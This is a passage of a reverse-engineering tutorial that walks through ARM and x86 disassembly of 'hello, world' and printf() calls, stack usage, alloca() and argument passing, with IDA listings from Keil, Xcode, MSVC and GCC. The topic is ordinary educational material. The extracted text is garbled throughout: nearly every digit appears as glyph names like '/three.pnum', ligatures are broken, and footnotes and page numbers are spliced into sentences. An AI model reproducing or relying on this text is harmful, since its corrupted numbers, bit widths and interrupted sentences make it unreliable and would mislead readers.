make things less messy, I offered to work in IDA /five.pnum.
So this instruction writes values of R4andLRregisters at the address in memory to which SP/one.pnum/zero.pnumpointing, then
decrements SPso it will points to a place in stack free for new entries.
This instruction, like PUSH instruction in thumb mode, is able save several register values at once and this may
be useful. By the way, there is no such thing in x/eight.pnum/six.pnum. It’s also can be noted that STMFD — generalization of PUSH
instruction (extending its features), because it can work with any register, not just with SPand this can be very
useful.
”ADR R0, aHelloWorld” instruction adding PCregister value to the offset, where the “hello, world” string is
located. How PCregister used here, one might ask? This is so called “position-independent code”/one.pnum/one.pnum, it is intended
to be executed not to be fixed to any addresses in memory. In the opcode of ADRinstruction, here is encoded a
/five.pnumsystem on chip
/six.pnumhttp://en.wikipedia.org/wiki/List_of_Windows_8_and_RT_tablet_devices
/seven.pnumfor example, ARM mode lacks PUSH /POPinstructions
/eight.pnumNOTTRANSLATED
/nine.pnumStore Multiple Full Descending
/one.pnum/zero.pnumstack pointer
/one.pnum/one.pnumRead more about it in relevant section /two.pnum./six.pnum
/four.pnum
difference between address of this instruction and the place where the string is located. Difference will always be
constant, without any dependence to the address where that code being loaded, by operation system, presum-
ably. That’s why all we need is to add address of current instruction (from PC) in order to get absolute address of
our C-string in memory.
”BL __2printf”/one.pnum/two.pnuminstruction calling printf() function. That’s how this instruction works:
∙write address a/f_ter BLinstruction ( 0xC) intoLR/one.pnum/three.pnumregister;
∙then pass control flow into printf() by writing its address into PC/one.pnum/four.pnumregister.
Because, when printf() finishes its work, it should have information, where it should return control, that’s
why each function passes control to the address stored in LRregister.
That is the difference between “pure” RISC-processors like ARM and x/eight.pnum/six.pnum, where address of return is stored in
stack/one.pnum/five.pnum.
By the way, absolute /three.pnum/two.pnum-bit address or offset cannot be encoded in /three.pnum/two.pnum-bit BLinstruction, because it has space
only for /two.pnum/four.pnum bits. It’s also worth to note that all ARM mode instructions has size /four.pnum bytes (/three.pnum/two.pnum bits), hence they all can
be located only on /four.pnum-byte boundary addresses. This mean, last /two.pnum bits of instruction address (always zero bits) may
be omitted. In summary, we have /two.pnum/six.pnum bit for offset encoding, this is enough to represent offset ±≈32M.
Next”MOV R0, #0”/one.pnum/six.pnuminstruction just writes 0intoR0register. That’s because our C-function returning 0and
returning value is to be placed in R0.
The last instruction ”LDMFD SP!, R4,PC”/one.pnum/seven.pnumis an inversive instruction of STMFD , it loads values from stack
for saving them into R4andPC, incremeting stack pointer SP. It can be said, it is similar to POP. Note: the very
first instruction STMFD savedR4andLRinto stack, but R4andPCarerestored . As I wrote before, in LR/one.pnum/eight.pnumregister
address of place saved, to where each function should return control. The very first function saving its value in
stack because our main() function will use that register in order to call printf() . And then, in the function end
this value can be written to PC, thus, by passing control to where our function was called. Since our main() function
is usually primary function in C/C++, apparently, control will be returned to operation system loader or to some
place in runtime C functions, or something like that.
DCB — assembly language directive, defining array of bytes or ASCII-strings, similar to DB directive in x/eight.pnum/six.pnum-
assembly language.
Non-optimizing Keil: thumb mode
Let’s compile the same example in Keil in thumb mode:
armcc.exe --thumb --c90 -O0 1.c
We will get (in IDA /five.pnum):
Listing /one.pnum./four.pnum: Non-optimizing Keil + thumb mode + IDA /five.pnum
.text:00000000 main
.text:00000000 10 B5 PUSH {R4,LR}
.text:00000002 C0 A0 ADR R0, aHelloWorld ; "hello, world"
.text:00000004 06 F0 2E F9 BL __2printf
.text:00000008 00 20 MOVS R0, #0
.text:0000000A 10 BD POP {R4,PC}
.text:00000304 68 65 6C 6C+aHelloWorld DCB "hello, world",0 ; DATA XREF: main+2
We can easily spot /two.pnum-byte (/one.pnum/six.pnum-bit) opcodes, this is, as I mentioned, thumb. Except BLinstruction. In fact, it
consisted in two /one.pnum/six.pnum-bit instructions. That’s because it’s not possible to load offset to printf() function into PC
when using so small space in one /one.pnum/six.pnum-bit opcode, obviously. That’s why first /one.pnum/six.pnum-bit instruction loads higher /one.pnum/zero.pnum bits
/one.pnum/two.pnumBranch with Link
/one.pnum/three.pnumlink register
/one.pnum/four.pnumprogram counter
/one.pnum/five.pnumRead more about this in next section /one.pnum./two.pnum
/one.pnum/six.pnumMOVe
/one.pnum/seven.pnumLoad Multiple Full Descending
/one.pnum/eight.pnumlink register
/five.pnum
of offset and second — loads /one.pnum/one.pnum lower bits of offset. As I mentioned, all instructions in thumb mode has size of /two.pnum
bytes or /one.pnum/six.pnum bits. This mean, it’s not possible for thumb-instruction to be on odd address whatsoever. Considering
this, last address bit may be omitted while instruction encoding. Summarizing, in BLthumb-instruction, ±≈2M
can be encoded as offset from current address.
Other instructions in functions are: PUSH andPOPworks just like described STMFD /LDMFD , butSPregister not
mentioned explicitely here. ADRworks just like in previous example. MOVS writes 0inR0register to zero returning.
Optimizing Xcode (LLVM) + ARM mode
Xcode /four.pnum./six.pnum./three.pnum without optimization turned on, produces a lot of redundant code, so we’ll study that version where
instruction count as small as possible: -O3.
Listing /one.pnum./five.pnum: Optimizing Xcode (LLVM) + ARM mode
__text:000028C4 _hello_world
__text:000028C4 80 40 2D E9 STMFD SP!, {R7,LR}
__text:000028C8 86 06 01 E3 MOV R0, #0x1686
__text:000028CC 0D 70 A0 E1 MOV R7, SP
__text:000028D0 00 00 40 E3 MOVT R0, #0
__text:000028D4 00 00 8F E0 ADD R0, PC, R0
__text:000028D8 C3 05 00 EB BL _puts
__text:000028DC 00 00 A0 E3 MOV R0, #0
__text:000028E0 80 80 BD E8 LDMFD SP!, {R7,PC}
__cstring:00003F62 48 65 6C 6C+aHelloWorld_0 DCB "Hello world!",0
Instructions STMFD andLDMFD are familiar to us.
MOVinstruction just writes 0x1686 number into R0register, this is offset pointing to the “Hello world!” string.
R7register, as it is standardized in [App/one.pnum/zero.pnum] is frame pointer, more on it below.
MOVT R0, #0 instruction writes /zero.pnum into higher /one.pnum/six.pnum bit of register. The issue is here in that generic MOVinstruction
in ARM mode may writes only lower /one.pnum/six.pnum bit of register. Remember, all instruction’s opcodes in ARM mode are lim-
ited in size to /three.pnum/two.pnum bits. Of course, this limitation is not related to moving between registers. So that’s why additional
instruction MOVT exist for writing into higher bits (from /one.pnum/six.pnum to /three.pnum/one.pnum inclusive). However, its usage here is redundant,
because”MOV R0, #0x1686” instruction above cleared higher part of register. Probably, it’s compiler’s shortcom-
ing.
”ADD R0, PC, R0” instruction adding PCtoR0, for calculating absolute address of “Hello world!” string, and
as we already know that, it’s “position-independent code” , so this corrective is essential here.
BLinstruction calling puts() instead of printf() .
GCC replaced first printf() call toputs() . Indeed: printf() with sole argument is almost analogous to
puts() .
Almost , because we need to be sure that this string will not contain printf-control statements starting with %:
then effect of these two functions will be different.
Why compiler replaced printf() toputs() ? Because puts() () work faster/one.pnum/nine.pnum.
puts() working faster because it just passes characters to stdout not comparing each with %symbol.
Next, we see familiar to us ”MOV R0, #0” instruction, intended to set /zero.pnum to R0register.
Optimizing Xcode (LLVM) + thumb-/two.pnum mode
By default, Xcode /four.pnum./six.pnum./three.pnum generating code for thumb-/two.pnum in such manner:
Listing /one.pnum./six.pnum: Optimizing Xcode (LLVM) + thumb-/two.pnum mode
__text:00002B6C _hello_world
__text:00002B6C 80 B5 PUSH {R7,LR}
__text:00002B6E 41 F2 D8 30 MOVW R0, #0x13D8
__text:00002B72 6F 46 MOV R7, SP
__text:00002B74 C0 F2 00 00 MOVT.W R0, #0
__text:00002B78 78 44 ADD R0, PC
/one.pnum/nine.pnumhttp://www.ciselant.de/projects/gcc_printf/gcc_printf.html
/six.pnum
__text:00002B7A 01 F0 38 EA BLX _puts
__text:00002B7E 00 20 MOVS R0, #0
__text:00002B80 80 BD POP {R7,PC}
...
__cstring:00003E70 48 65 6C 6C 6F 20+aHelloWorld DCB "Hello world!",0xA,0
BLandBLXinstructions in thumb mode, as we remember, encoded as pair of /one.pnum/six.pnum-bit instructions and in thumb-
/two.pnum, these surrogate opcodes extended in such way so that new instruction may be encoded here as /three.pnum/two.pnum-bit instruc-
tions. That’s easily observable — opcodes of thumb-/two.pnum instructions are also beginning with 0xFx or0xEx . But in
IDA /five.pnum listings, first byte of opcode is at the place of second, that’s because instructions here encoded as follows:
last byte and then first one (for thumb and thumb-/two.pnum modes), or, (for instructions in ARM mode): fourth byte, then
third, then second and first. So as we see, MOVW ,MOVT.W andBLXinstructions are beginning with 0xFx .
One of thumb-/two.pnum instructions is “MOVW R0, #0x13D8” — it writes /one.pnum/six.pnum-bit value into lower part of R0register.
Also“MOVT.W R0, #0” — this instruction works just like MOVT from previous example, but it works in thumb-/two.pnum.
Among other differences, here is BLXinstruction used instead of BL. Difference in that way that beside saving
of return address in LRregister and passing control to puts() function, processor is switching from thumb mode
to ARM or back. This instruction in place here because the instruction to which control is passed looks like (it’s
encoded in ARM mode):
__symbolstub1:00003FEC _puts ; CODE XREF: _hello_world+E
__symbolstub1:00003FEC 44 F0 9F E5 LDR PC, =__imp__puts
So, observant reader may ask: why not to call puts() right at the place of code where it needed?
But that’s not very space-efficient, and that’s why.
Almost any program uses external dynamic libraries, like DLL in Windows, .so in *NIX or .dylib in Mac OS X.
O/f_ten used library functions are stored in dynamic libraries, including standard C-function puts() .
In executable binary file (Windows PE .exe, ELF or Mach-O) a section of imports is present, that is list of symbols
(functions or global variables) being imported from external modules and also names of these modules.
Operation system loader loads all modules need and, while enumerating importing symbols in primary mod-
ule, sets correct addresses of each symbol.
In our case, __imp__puts is /three.pnum/two.pnum-bit variable where OS loader will write correct address of that function in external
library. So that LDRinstruction just takes /three.pnum/two.pnum-bit value from this variable and, writing it into PCregister, just passing
control to it.
So to readuce a time OS loader needs for doing this procedure, it’s good idea for it to write address of each
symbol only once, to special place for it.
Besides, as we already figured out, it’s not possible to load /three.pnum/two.pnum-bit value into register using only one instruction,
without memory access. So, it is optimal to allocate separate function working in ARM mode with only one goal
— to pass control to dynamic library. And then to jump to this short one-instruction function (so called thunk-
function) from thumb-code.
By the way, in previous example (compiled for ARM mode) control passing by BLinstruction is going to the
same thunk-function, however, processor mode is not switched (hence, absence of “X” in instruction mnemonic).
/seven.pnum
/one.pnum./two.pnum Stack
Stack — is one of the most fundamental things in computer science./two.pnum/zero.pnum.
Technically, it’s just a memory block in process memory + ESPorRSPregister in x/eight.pnum/six.pnum, or SPregister in ARM, as
a pointer within this block.
Most frequently used stack access instructions are PUSH andPOP(both in x/eight.pnum/six.pnum and ARM thumb-mode). PUSH
subtracting ESP/RSP/SPby4and then writing contents of its sole operand to the memory address pointing by
ESP/RSP/SP.
POPis reverse operation: get a data from memory pointing by ESP/RSP/SP, put it to operand (o/f_ten register) and
then add 4toESP/RSP/SP. Of course, this is for /three.pnum/two.pnum-bit environment. 8will be here instead of 4in x/six.pnum/four.pnum environment.
A/f_ter stack allocation, stack pointer pointing to the end of stack. PUSH increasing stack pointer, and POPde-
creasing. The end of stack is actually at the beginning of allocated for stack memory block. It seems strange, but
it is so.
Nevertheless, ARM has instructions supporting ascending stacks, but also descending stacks. For example,
STMFD/two.pnum/one.pnum/LDMFD/two.pnum/two.pnum, STMED/two.pnum/three.pnum/LDMED/two.pnum/four.pnuminstructions are intended for work with descending stack. STMFA/two.pnum/five.pnum/LMDFA/two.pnum/six.pnum,
STMEA/two.pnum/seven.pnum/LDMEA/two.pnum/eight.pnuminstructions are intended for work with ascending stack.
What stack is used for?
/one.pnum./two.pnum./one.pnum Save return address where function should return control a/f_ter execution
x/eight.pnum/six.pnum
While calling another function by CALL instruction, the address of point exactly a/f_ter CALL instruction is saved to
stack, and then unconditional jump to the address from CALL operand is executed.
CALL isPUSH address_after_call / JMP operand instructions pair equivalent.
RETis fetching value from stack and jump to it — it is POP tmp / JMP tmp instructions pair equivalent.
Stack overflow is simple, just run eternal recursion:
void f()
{
f();
};
MSVC /two.pnum/zero.pnum/zero.pnum/eight.pnum reporting about problem:
c:\tmp6>cl ss.cpp /Fass.asm
Microsoft (R) 32-bit C/C++ Optimizing Compiler Version 15.00.21022.08 for 80x86
Copyright (C) Microsoft Corporation. All rights reserved.
ss.cpp
c:\tmp6\ss.cpp(4) : warning C4717: ’f’ : recursive on all control paths, function will cause runtime stack
overflow
...but generates right code anyway:
?f@@YAXXZ PROC ; f
; File c:\tmp6\ss.cpp
; Line 2
push ebp
mov ebp, esp
; Line 3
call ?f@@YAXXZ ; f
/two.pnum/zero.pnumhttp://en.wikipedia.org/wiki/Call_stack
/two.pnum/one.pnumStore Multiple Full Descending
/two.pnum/two.pnumLoad Multiple Full Descending
/two.pnum/three.pnumStore Multiple Empty Descending
/two.pnum/four.pnumLoad Multiple Empty Descending
/two.pnum/five.pnumStore Multiple Full Ascending
/two.pnum/six.pnumLoad Multiple Full Ascending
/two.pnum/seven.pnumStore Multiple Empty Ascending
/two.pnum/eight.pnumLoad Multiple Empty Ascending
/eight.pnum
; Line 4
pop ebp
ret 0
?f@@YAXXZ ENDP ; f
...Also, if we turn on optimization ( /Oxoption), the optimized code will not overflow stack, but will work cor-
rectly/two.pnum/nine.pnum:
?f@@YAXXZ PROC ; f
; File c:\tmp6\ss.cpp
; Line 2
$LL3@f:
; Line 3
jmp SHORT $LL3@f
?f@@YAXXZ ENDP ; f
GCC /four.pnum./four.pnum./one.pnum generating the same code in both cases, although not warning about problem.
ARM
ARM programs also use stack for return address savings, but differently. As it was mentioned in “Hello, world!” /one.pnum./one.pnum./two.pnum,
return address is saved to LR(link register ). However, if one need to call some another function and use LRregister
one more time, its value should be saved. Usually, it is saved in function prologue, o/f_ten, we see there instruction
like“PUSH R4-R7,LR” , and also this instruction in epilogue “POP R4-R7,PC” — thus register values to be used
in function are saved in stack, including LR.
Nevertheless, if some function never call any other function, in ARM terminology it’s called leaf function/three.pnum/zero.pnum. As a
consequence, “leaf” function don’t use LRregister. And if this function is small, if it use small number of registers,
it may not use stack at all. Thus, it is possible to call “leaf” function without stack usage. This could be faster than
in x/eight.pnum/six.pnum, because external RAM is not used for stack/three.pnum/one.pnum. Or, it can be useful for such situations, when memory for
stack is not yet allocated or not available.
/one.pnum./two.pnum./two.pnum Function arguments passing
push arg3
push arg2
push arg1
call f
add esp, 4*3
Callee/three.pnum/two.pnumfunction get its arguments via stack ponter.
See also section about calling conventions /two.pnum./five.pnum.
It is important to note that no one oblige programmers to pass arguments through stack, it is not prerequisite.
One could implement any other method not using stack.
For example, it is possible to allocate a place for arguments in heap, fill it and pass to a function via pointer to
this pack in EAXregister. And this will work/three.pnum/three.pnum.
However, it is convenient tradition in x/eight.pnum/six.pnum and ARM to use stack for this.
/one.pnum./two.pnum./three.pnum Local variable storage
A function could allocate some space in stack for its local variables just shi/f_ting stack pointer deeply enough to
stack bottom.
It is also not prerequisite. You could store local variables wherever you like. But traditionally it is so.
/two.pnum/nine.pnumirony here
/three.pnum/zero.pnumhttp://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.faqs/ka13785.html
/three.pnum/one.pnumSome time ago, on PDP-/one.pnum/one.pnum and VAX, CALL instruction (calling other functions) was expensive, up to /five.pnum/zero.pnum% of execution time might be
spent on it, so it was common sense that big number of small function is anti-pattern [Ray/zero.pnum/three.pnum, Chapter /four.pnum, Part II].
/three.pnum/two.pnumFunction being called
/three.pnum/three.pnumFor example, in “The Art of Computer Programming” book by Donald Knuth, in section /one.pnum./four.pnum./one.pnum dedicated to subroutines [Knu/nine.pnum/eight.pnum, section
/one.pnum./four.pnum./one.pnum], we can read about one way to supply arguments to subroutine is simply to list them a/f_ter the JMPinstruction passing control to
subroutine. Knuth writes that this method was particularly convenient on System//three.pnum/six.pnum/zero.pnum.
/nine.pnum
x/eight.pnum/six.pnum: alloca() function
It is worth noting alloca() function./three.pnum/four.pnum.
This function works like malloc() , but allocate memory just in stack.
Allocated memory chunk is not needed to be freed via free() function call because function epilogue /two.pnum./two.pnum will
returnESPback to initial state and allocated memory will be just annuled.
It is worth noting how alloca() implemented.
This function, if to simplify, just shi/f_ting ESPdeeply to stack bottom so much bytes you need and set ESPas a
pointer to that allocated block. Let’s try:
#include <malloc.h>
#include <stdio.h>
void f()
{
char *buf=(char*)alloca (600);
_snprintf (buf, 600, "hi! %d, %d, %d\n", 1, 2, 3);
puts (buf);
};
(_snprintf() function works just like printf() , but instead dumping result into stdout (e.g., to terminal or
console), write it to bufbuffer.puts() copiesbufcontents to stdout. Of course, these two function calls might be
replaced by one printf() call, but I would like to illustrate small buffer usage.)
Let’s compile (MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum):
Listing /one.pnum./seven.pnum: MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum
...
mov eax, 600 ; 00000258H
call __alloca_probe_16
mov esi, esp
push 3
push 2
push 1
push OFFSET $SG2672
push 600 ; 00000258H
push esi
call __snprintf
push esi
call _puts
add esp, 28 ; 0000001cH
...
The solealloca() argument passed via EAX(instead of pushing into stack)/three.pnum/five.pnum. A/f_teralloca() call,ESPis now
pointing to the block of /six.pnum/zero.pnum/zero.pnum bytes and we can use it as memory for bufarray.
GCC /four.pnum./four.pnum./one.pnum can do the same without calling external functions:
Listing /one.pnum./eight.pnum: GCC /four.pnum./four.pnum./one.pnum
public f
f proc near ; CODE XREF: main+6
s = dword ptr -10h
var_C = dword ptr -0Ch
push ebp
/three.pnum/four.pnumAs of MSVC, function implementation can be found in alloca16.asm andchkstk.asm inC:\Program Files (x86)\Microsoft
Visual Studio 10.0\VC\crt\src\intel
/three.pnum/five.pnumIt’s because alloca() is rather compiler intrinsic than usual function
/one.pnum/zero.pnum
mov ebp, esp
sub esp, 38h
mov eax, large gs:14h
mov [ebp+var_C], eax
xor eax, eax
sub esp, 624
lea eax, [esp+18h]
add eax, 0Fh
shr eax, 4 ; align pointer
shl eax, 4 ; by 16-byte border
mov [ebp+s], eax
mov eax, offset format ; "hi! %d, %d, %d\n"
mov dword ptr [esp+14h], 3
mov dword ptr [esp+10h], 2
mov dword ptr [esp+0Ch], 1
mov [esp+8], eax ; format
mov dword ptr [esp+4], 600 ; maxlen
mov eax, [ebp+s]
mov [esp], eax ; s
call _snprintf
mov eax, [ebp+s]
mov [esp], eax ; s
call _puts
mov eax, [ebp+var_C]
xor eax, large gs:14h
jz short locret_80484EB
call ___stack_chk_fail
locret_80484EB: ; CODE XREF: f+70
leave
retn
f endp
/one.pnum./two.pnum./four.pnum (Windows) SEH
SEH ( Structured Exception Handling ) records are also stored in stack (if needed)./three.pnum/six.pnum.
/one.pnum./two.pnum./five.pnum Buffer overflow protection
More about it here /one.pnum./one.pnum/four.pnum./two.pnum.
/three.pnum/six.pnumClassic Matt Pietrek article about SEH: http://www.microsoft.com/msj/0197/Exception/Exception.aspx
/one.pnum/one.pnum
/one.pnum./three.pnum printf() with several arguments
Now let’s extend Hello, world! /one.pnum./one.pnum example, replacing printf() inmain() function body by this:
printf("a=%d; b=%d; c=%d", 1, 2, 3);
/one.pnum./three.pnum./one.pnum x/eight.pnum/six.pnum
Let’s compile it by MSVC /two.pnum/zero.pnum/one.pnum/zero.pnum and we got:
$SG3830 DB ’a=%d; b=%d; c=%d’, 00H
...
push 3
push 2
push 1
push OFFSET $SG3830
call _printf
add esp, 16 ; 00000010H
Almost the same, but now we can see that printf() arguments are pushing into stack in reverse order: and
the first argument is pushing in as the last one.
By the way, variables of inttype in /three.pnum/two.pnum-bit environment has /three.pnum/two.pnum-bit width, that’s /four.pnum bytes.
So, we got here /four.pnum arguments. 4*4 = 16 — they occupy in stack exactly /one.pnum/six.pnum bytes: /three.pnum/two.pnum-bit pointer to string and
/three.pnum number of inttype.
When stack pointer ( ESPregister) is corrected by “ADD ESP, X” instruction a/f_ter some function call, o/f_ten, the
number of function arguments could be deduced here: just divide X by /four.pnum.
Of course, this is related only to cdecl calling convention.
See also section about calling conventions /two.pnum./five.pnum.
It is also possible for compiler to merge several “ADD ESP, X” instructions into one, a/f_ter last call:
push a1
push a2
call ...
...
push a1
call ...
...
push a1
push a2
push a3
call ...
add esp, 24
Now let’s compile the same in Linux by GCC /four.pnum./four.pnum./one.pnum and take a look in IDA /five.pnum what we got:
main proc near
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF0h
sub esp, 10h
mov eax, offset aADBDCD ; "a=%d; b=%d; c=%d"
mov [esp+10h+var_4], 3
mov [esp+10h+var_8], 2
mov [esp+10h+var_C], 1
mov [esp+10h+var_10], eax
call _printf
/one.pnum/two.pnum
mov eax, 0
leave
retn
main endp
It can be said, the difference between code by MSVC and GCC is only in method of placing arguments into stack.
Here GCC working directly with stack without PUSH /POP.
/one.pnum./three.pnum./two.pnum ARM: /three.pnum printf() arguments
Traditionally, ARM arguments passing scheme (calling convention) is as follows: the /four.pnum first arguments are passed in
R0-R3registers and remaining arguments — via stack. This resembling arguments passing scheme in fastcall /two.pnum./five.pnum./three.pnum
or win/six.pnum/four.pnum /two.pnum./five.pnum./five.pnum.
Non-optimizing Keil + ARM mode
Listing /one.pnum./nine.pnum: Non-optimizing Keil + ARM mode
.text:00000014 printf_main1
.text:00000014 10 40 2D E9 STMFD SP!, {R4,LR}
.text:00000018 03 30 A0 E3 MOV R3, #3
.text:0000001C 02 20 A0 E3 MOV R2, #2
.text:00000020 01 10 A0 E3 MOV R1, #1
.text:00000024 1D 0E 8F E2 ADR R0, aADBDCD ; "a=%d; b=%d; c=%d\n"
.text:00000028 0D 19 00 EB BL __2printf
.text:0000002C 10 80 BD E8 LDMFD SP!, {R4,PC}
So, the first /four.pnum arguments are passing via R0-R0arguments in this order: pointer to printf() format string in
R0, then 1in R/one.pnum, 2in R/two.pnum and 3in R/three.pnum.
Nothing unusual so far.
Optimizing Keil + ARM mode
Listing /one.pnum./one.pnum/zero.pnum: Optimizing Keil + ARM mode
.text:00000014 EXPORT printf_main1
.text:00000014 printf_main1
.text:00000014 03 30 A0 E3 MOV R3, #3
.text:00000018 02 20 A0 E3 MOV R2, #2
.text:0000001C 01 10 A0 E3 MOV R1, #1
.text:00000020 1E 0E 8F E2 ADR R0, aADBDCD ; "a=%d; b=%d; c=%d\n"
.text:00000024 CB 18 00 EA B __2printf
This is optimized ( -O3) version for ARM mode and here we see Bas the last instruction instead of familiar BL.
Another difference between this optimized version and previous one, compiled without optimization, is also in the
fact that there are no function prologue and epilogue (instructions saving R0andLRregisters values). Binstruction
just jumping to another address, without any LRregister manipulation, that is, it’s JMPanalogue in x/eight.pnum/six.pnum. Why it
works fine? Because this code is in fact equivalent to the previous. There are two main reasons: /one.pnum) stack is not
modified, as well as SPstack pointer; /two.pnum) printf() call is the last one, there are nothing going on a/f_ter it. A/f_ter
finishing, printf() function will just return control to the address stored in LR. But the address of the place from
where our function was called is now in LR! And consequently, control from printf() will returned to that place.
As a consequent, we don’t need to save LR, because we don’t need to modify LR. And we don’t need to modify LR
because there are no other functions calls except printf() , furthermore, a/f_ter this call we are not planning to do
anything! That’s why this optimization is possible.
Another similar example was described in “switch()/case/default” section, here /one.pnum./nine.pnum./one.pnum.
/one.pnum/three.pnum
Optimizing Keil + thumb mode
Listing /one.pnum./one.pnum/one.pnum: Optimizing Keil + thumb mode
.text:0000000C printf_main1
.text:0000000C 10 B5 PUSH {R4,LR}
.text:0000000E 03 23 MOVS R3, #3
.text:00000010 02 22 MOVS R2, #2
.text:00000012 01 21 MOVS R1, #1
.text:00000014 A4 A0 ADR R0, aADBDCD ; "a=%d; b=%d; c=%d\n"
.text:00000016 06 F0 EB F8 BL __2printf
.text:0000001A 10 BD POP {R4,PC}
There are no significant difference from non-optimized code for ARM mode.
/one.pnum./three.pnum./three.pnum ARM: /eight.pnum printf() arguments
To see, how other arguments will be passed via stack, let’s change our example again by increasing number of
arguments to be passed to /nine.pnum ( printf() format string + /eight.pnum intvariables):
void printf_main2()
{
printf("a=%d; b=%d; c=%d; d=%d; e=%d; f=%d; g=%d; h=%d\n", 1, 2, 3, 4, 5, 6, 7, 8);
};
Optimizing Keil: ARM mode
.text:00000028 printf_main2
.text:00000028
.text:00000028 var_18 = -0x18
.text:00000028 var_14 = -0x14
.text:00000028 var_4 = -4
.text:00000028
.text:00000028 04 E0 2D E5 STR LR, [SP,#var_4]!
.text:0000002C 14 D0 4D E2 SUB SP, SP, #0x14
.text:00000030 08 30 A0 E3 MOV R3, #8
.text:00000034 07 20 A0 E3 MOV R2, #7
.text:00000038 06 10 A0 E3 MOV R1, #6
.text:0000003C 05 00 A0 E3 MOV R0, #5
.text:00000040 04 C0 8D E2 ADD R12, SP, #0x18+var_14
.text:00000044 0F 00 8C E8 STMIA R12, {R0-R3}
.text:00000048 04 00 A0 E3 MOV R0, #4
.text:0000004C 00 00 8D E5 STR R0, [SP,#0x18+var_18]
.text:00000050 03 30 A0 E3 MOV R3, #3
.text:00000054 02 20 A0 E3 MOV R2, #2
.text:00000058 01 10 A0 E3 MOV R1, #1
.text:0000005C 6E 0F 8F E2 ADR R0, aADBDCDDDEDFDGD ; "a=%d; b=%d; c=%d; d=%d; e=%d; f=%d
; g=%"...
.text:00000060 BC 18 00 EB BL __2printf
.text:00000064 14 D0 8D E2 ADD SP, SP, #0x14
.text:00000068 04 F0 9D E4 LDR PC, [SP+4+var_4],#4
This code can be divided into several parts:
∙Function prologue:
The very first “STR LR, [SP,#var_4]!” instruction save LRin stack, because we will use this register for
printf() call.
The second “SUB SP, SP, #0x14” instruction decreasing SPstack pointer, but in fact, this procedure is
needed for allocating a space of size 0x14(20) bytes in the stack. Indeed, we need to pass /five.pnum /three.pnum/two.pnum-bit values via
stack toprintf() , and each one occupy /four.pnum bytes, that is 5*4 = 20 — exactly. Other /four.pnum /three.pnum/two.pnum-bit values will be
passed in registers.
/one.pnum/four.pnum
∙Passing /five.pnum, /six.pnum, /seven.pnum and /eight.pnum via stack:
Then values /five.pnum, /six.pnum, /seven.pnum and /eight.pnum are written to R0,R1,R2andR3registers respectively. Then “ADD R12, SP,
#0x18+var_14” instruction write an address of place in stack, where these /four.pnum variables will be written, into
R12register. var_/one.pnum/four.pnum is an assembly macro, equal to −0x14, such macros are created by IDA /five.pnum in order to
show simply how code accessing stack. var_? macros created by IDA /five.pnum reflecting local variables in stack. So,
SP+ 4will be written into R12register. The next “STMIA R12, R0-R3” instruction writes R0-R3registers
contents at the place in memory to which R12pointing. STMIA instruction meaning Store Multiple Increment
A/f_ter .Increment A/f_ter meaning that R/one.pnum/two.pnum will be increasing by /four.pnum a/f_ter each register value write.
∙Passing 4via stack: 4is stored in R0and then, this value, with the help of “STR R0, [SP,#0x18+var_18]”
instruction, is saved in stack. var_/one.pnum/eight.pnum is−0x18, offset will be 0, so, value from R0register ( 4) will be written to
a placeSPpointing to.
∙Passing /one.pnum, /two.pnum and /three.pnum via registers:
Values of first /three.pnum numbers (a, b, c) (/one.pnum, /two.pnum, /three.pnum respectively) are passing in R/one.pnum, R/two.pnum and R/three.pnum registers right before
printf() call, and other /five.pnum values are passed via stack and this is how:
∙printf() call:
∙Function epilogue:
“ADD SP, SP, #0x14” instruction returning SPto former place, thus annulling what was written to stack.
Of course, what was written in stack will stay there, but it all will be rewritten while execution of following
functions.
“LDR PC, [SP+4+var_4],#4” instruction loading saved in stack LRvalue into PC, providing exit from the
function.
Optimizing Keil: thumb mode
.text:0000001C printf_main2
.text:0000001C
.text:0000001C var_18 = -0x18
.text:0000001C var_14 = -0x14
.text:0000001C var_8 = -8
.text:0000001C
.text:0000001C 00 B5 PUSH {LR}
.text:0000001E 08 23 MOVS R3, #8
.text:00000020 85 B0 SUB SP, SP, #0x14
.text:00000022 04 93 STR R3, [SP,#0x18+var_8]
.text:00000024 07 22 MOVS R2, #7
.text:00000026 06 21 MOVS R1, #6
.text:00000028 05 20 MOVS R0, #5
.text:0000002A 01 AB ADD R3, SP, #0x18+var_14
.text:0000002C 07 C3 STMIA R3!, {R0-R2}
.text:0000002E 04 20 MOVS R0, #4
.text:00000030 00 90 STR R0, [SP,#0x18+var_18]
.text:00000032 03 23 MOVS R3, #3
.text:00000034 02 22 MOVS R2, #2
.text:00000036 01 21 MOVS R1, #1
.text:00000038 A0 A0 ADR R0, aADBDCDDDEDFDGD ; "a=%d; b=%d; c=%d; d=%d; e=%d; f=%d
; g=%"...
.text:0000003A 06 F0 D9 F8 BL __2printf
.text:0000003E
.text:0000003E loc_3E ; CODE XREF: example13_f+16
.text:0000003E 05 B0 ADD SP, SP, #0x14
.text:00000040 00 BD POP {PC}
Almost same as in previous example, however, this is thumb code and values are packed into stack differently:
8for the first time, then 5,6,7for the second and 4for the third.
/one.pnum/five.pnum
Optimizing Xcode (LLVM): ARM mode
__text:0000290C _printf_main2
__text:0000290C
__text:0000290C var_1C = -0x1C
__text:0000290C var_C = -0xC
__text:0000290C
__text:0000290C 80 40 2D E9 STMFD SP!, {R7,LR}
__text:00002910 0D 70 A0 E1 MOV R7, SP
__text:00002914 14 D0 4D E2 SUB SP, SP, #0x14
__text:00002918 70 05 01 E3 MOV R0, #0x1570
__text:0000291C 07 C0 A0 E3 MOV R12, #7
__text:00002920 00 00 40 E3 MOVT R0, #0
__text:00002924 04 20 A0 E3 MOV R2, #4
__text:00002928 00 00 8F E0 ADD R0, PC, R0
__text:0000292C 06 30 A0 E3 MOV R3, #6
__text:00002930 05 10 A0 E3 MOV R1, #5
__text:00002934 00 20 8D E5 STR R2, [SP,#0x1C+var_1C]
__text:00002938 0A 10 8D E9 STMFA SP, {R1,R3,R12}
__text:0000293C 08 90 A0 E3 MOV R9, #8
__text:00002940 01 10 A0 E3 MOV R1, #1
__text:00002944 02 20 A0 E3 MOV R2, #2
__text:00002948 03 30 A0 E3 MOV R3, #3
__text:0000294C 10 90 8D E5 STR R9, [SP,#0x1C+var_C]
__text:00002950 A4 05 00 EB BL _printf
__text:00002954 07 D0 A0 E1 MOV SP, R7
